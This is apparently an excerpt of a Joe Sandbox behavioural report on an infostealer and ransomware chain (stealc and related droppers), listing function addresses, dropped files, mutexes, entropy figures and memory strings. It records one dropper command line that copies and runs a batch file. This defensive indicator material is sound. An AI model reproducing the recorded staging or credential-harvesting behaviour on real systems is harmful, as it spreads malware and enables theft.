Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF55340	6_2_6BF55340
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF9D320	6_2_6BF9D320
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF71AF0	6_2_6BF71AF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF9E2F0	6_2_6BF9E2F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF98AC0	6_2_6BF98AC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF6CAB0	6_2_6BF6CAB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFC2AB0	6_2_6BFC2AB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF522A0	6_2_6BF522A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF84AA0	6_2_6BF84AA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFCBA90	6_2_6BFCBA90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF99A60	6_2_6BF99A60
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF8D9B0	6_2_6BF8D9B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF5C9A0	6_2_6BF5C9A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF95190	6_2_6BF95190
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFB2990	6_2_6BFB2990
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFAB970	6_2_6BFAB970
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFCB170	6_2_6BFCB170
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF6D960	6_2_6BF6D960
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF7A940	6_2_6BF7A940
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF7C0E0	6_2_6BF7C0E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF958E0	6_2_6BF958E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFC50C7	6_2_6BFC50C7
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF860A0	6_2_6BF860A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF9F070	6_2_6BF9F070
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF78850	6_2_6BF78850
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF7D850	6_2_6BF7D850
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF9B820	6_2_6BF9B820
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFA4820	6_2_6BFA4820
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF67810	6_2_6BF67810
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF86FF0	6_2_6BF86FF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF5DFE0	6_2_6BF5DFE0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFA77A0	6_2_6BFA77A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF97710	6_2_6BF97710
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF69F00	6_2_6BF69F00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF5BEF0	6_2_6BF5BEF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF6FEF0	6_2_6BF6FEF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFC76E3	6_2_6BFC76E3
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFB4EA0	6_2_6BFB4EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF75E90	6_2_6BF75E90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFBE680	6_2_6BFBE680
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF5C670	6_2_6BF5C670
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFC6E63	6_2_6BFC6E63
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF79E50	6_2_6BF79E50
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF93E50	6_2_6BF93E50
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFA2E4E	6_2_6BFA2E4E
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF74640	6_2_6BF74640
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFB9E30	6_2_6BFB9E30
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF97E10	6_2_6BF97E10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFA5600	6_2_6BFA5600
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFB85F0	6_2_6BFB85F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF90DD0	6_2_6BF90DD0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF7ED10	6_2_6BF7ED10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF80512	6_2_6BF80512
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF6FD00	6_2_6BF6FD00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF96CF0	6_2_6BF96CF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF5D4E0	6_2_6BF5D4E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF7D4D0	6_2_6BF7D4D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF664C0	6_2_6BF664C0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFB34A0	6_2_6BFB34A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFBC4A0	6_2_6BFBC4A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF66C80	6_2_6BF66C80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFC545C	6_2_6BFC545C
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF65440	6_2_6BF65440
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFC542B	6_2_6BFC542B
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF95C10	6_2_6BF95C10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFA2C10	6_2_6BFA2C10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFCAC00	6_2_6BFCAC00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0C6C00	6_2_6C0C6C00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0DAC30	6_2_6C0DAC30
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C00AC60	6_2_6C00AC60
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C05ECD0	6_2_6C05ECD0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C188D20	6_2_6C188D20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C12AD50	6_2_6C12AD50
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0CED70	6_2_6C0CED70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C096D90	6_2_6C096D90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C004DB0	6_2_6C004DB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C18CDC0	6_2_6C18CDC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0E0E20	6_2_6C0E0E20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C09EE70	6_2_6C09EE70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C086E90	6_2_6C086E90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C00AEC0	6_2_6C00AEC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0A0EC0	6_2_6C0A0EC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C006F10	6_2_6C006F10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C140F20	6_2_6C140F20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C06EF40	6_2_6C06EF40
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0C2F70	6_2_6C0C2F70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C148FB0	6_2_6C148FB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C00EFB0	6_2_6C00EFB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C000FE0	6_2_6C000FE0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0DEFF0	6_2_6C0DEFF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C050820	6_2_6C050820
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C08A820	6_2_6C08A820
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0D4840	6_2_6C0D4840
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C1068E0	6_2_6C1068E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C056900	6_2_6C056900
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C038960	6_2_6C038960
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0909A0	6_2_6C0909A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0BA9A0	6_2_6C0BA9A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0C09B0	6_2_6C0C09B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C11C9E0	6_2_6C11C9E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0349F0	6_2_6C0349F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0AEA00	6_2_6C0AEA00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0B8A30	6_2_6C0B8A30
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C07CA70	6_2_6C07CA70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C07EA80	6_2_6C07EA80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFFECC0	6_2_6BFFECC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0A0BA0	6_2_6C0A0BA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C106BE0	6_2_6C106BE0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C064420	6_2_6C064420
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C08A430	6_2_6C08A430
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C018460	6_2_6C018460
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C12A480	6_2_6C12A480
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0464D0	6_2_6C0464D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C09A4D0	6_2_6C09A4D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C148550	6_2_6C148550
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C058540	6_2_6C058540
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C104540	6_2_6C104540
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C062560	6_2_6C062560
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0A0570	6_2_6C0A0570
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0CA5E0	6_2_6C0CA5E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C08E5F0	6_2_6C08E5F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C05C650	6_2_6C05C650
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0246D0	6_2_6C0246D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C05E6E0	6_2_6C05E6E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C09E6E0	6_2_6C09E6E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C080700	6_2_6C080700
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFF8090	6_2_6BFF8090
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C02A7D0	6_2_6C02A7D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0CC000	6_2_6C0CC000
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0C8010	6_2_6C0C8010
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C04E070	6_2_6C04E070
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Code function: 9_2_0040497C	9_2_0040497C
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Code function: 9_2_00406ED2	9_2_00406ED2
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Code function: 9_2_004074BB	9_2_004074BB

Source: Joe Sandbox View

Dropped File: C:\ProgramData\LgAmARwZ\Application.exe 8521A1F4D523A2A9E7F8DDF01147E65E7F3FF54B268E9B40F91E07DC01FA148F

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: String function: 00F145C0 appears 316 times
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: String function: 6BF8CBE8 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: String function: 6BF994D0 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: String function: 6C023620 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: String function: 6C029B10 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Code function: String function: 004062A3 appears 58 times

Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 272

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: random[1].exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dac4554719.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Application.exe.29.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9971687670299727
Source: file.exe	Static PE information: Section: keanncem ZLIB complexity 0.994250135140173
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9971687670299727
Source: axplong.exe.0.dr	Static PE information: Section: keanncem ZLIB complexity 0.994250135140173
Source: random[2].exe.5.dr	Static PE information: Section: ZLIB complexity 0.9980836108934169
Source: 1bd0484d71.exe.5.dr	Static PE information: Section: ZLIB complexity 0.9980836108934169
Source: random[1].exe0.5.dr	Static PE information: Section: ZLIB complexity 0.9980897335423198
Source: c1a4d3220c.exe.5.dr	Static PE information: Section: ZLIB complexity 0.9980897335423198
Source: GOLD1234[1].exe.5.dr	Static PE information: Section: .call ZLIB complexity 1.0003314936926606
Source: GOLD1234.exe.5.dr	Static PE information: Section: .call ZLIB complexity 1.0003314936926606
Source: random[1].exe1.5.dr	Static PE information: Section: dcpywpmo ZLIB complexity 0.994637644070367
Source: f6f4816752.exe.5.dr	Static PE information: Section: dcpywpmo ZLIB complexity 0.994637644070367
Source: shop[1].exe.5.dr	Static PE information: Section: .bss ZLIB complexity 1.0003314936926606
Source: shop.exe.5.dr	Static PE information: Section: .bss ZLIB complexity 1.0003314936926606
Source: XLN9V631J4Y45UE4.exe.27.dr	Static PE information: Section: ZLIB complexity 0.9981905653950953
Source: XLN9V631J4Y45UE4.exe.27.dr	Static PE information: Section: npluczcb ZLIB complexity 0.9944600974718245

Source: random[1].exe1.5.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: f6f4816752.exe.5.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: 29.2.dac4554719.exe.12831a78.1.raw.unpack, searchX64LPVOIDhierarchy.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 29.0.dac4554719.exe.5e408e.1.raw.unpack, searchX64LPVOIDhierarchy.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@83/101@0/13

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 6_2_6BFB7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

6_2_6BFB7030

Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe

9_2_004044A5

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 6_2_00F28680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

6_2_00F28680

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 6_2_00F23720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

6_2_00F23720

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\stealc_default2[1].exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5124:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6216:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3264:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7128
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3352:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: stealc_default2.exe, 00000006.00000002.2673896402.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000006.00000002.2642192619.000000001BAF3000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000006.00000002.2675137486.000000006C18F000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: stealc_default2.exe, 00000006.00000002.2673896402.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000006.00000002.2642192619.000000001BAF3000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000006.00000002.2675137486.000000006C18F000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: stealc_default2.exe, 00000006.00000002.2673896402.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000006.00000002.2642192619.000000001BAF3000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000006.00000002.2675137486.000000006C18F000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: stealc_default2.exe, 00000006.00000002.2673896402.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000006.00000002.2642192619.000000001BAF3000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000006.00000002.2675137486.000000006C18F000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: stealc_default2.exe, stealc_default2.exe, 00000006.00000002.2673896402.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000006.00000002.2642192619.000000001BAF3000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000006.00000002.2675137486.000000006C18F000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: stealc_default2.exe, 00000006.00000002.2673896402.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000006.00000002.2642192619.000000001BAF3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: stealc_default2.exe, 00000006.00000002.2673896402.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000006.00000002.2642192619.000000001BAF3000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000006.00000002.2675137486.000000006C18F000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: stealc_default2.exe, 00000006.00000003.2480124295.0000000021A79000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733024762.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733888758.000000000398E000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2895920185.0000000005924000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2949495792.0000000003998000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3102266896.0000000003B48000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3106922930.0000000003B2A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: stealc_default2.exe, 00000006.00000002.2673896402.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000006.00000002.2642192619.000000001BAF3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: stealc_default2.exe, 00000006.00000002.2673896402.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000006.00000002.2642192619.000000001BAF3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe

ReversingLabs: Detection: 47%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: new_v8.exe	String found in binary or memory: "app.update.lastUpdateTime.recipe-client-addon-run", 1696333830); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856); user_pref("app.update.lastUpdateTime.xpi-signatur

Source: C:\Users\user\Desktop\file.exe

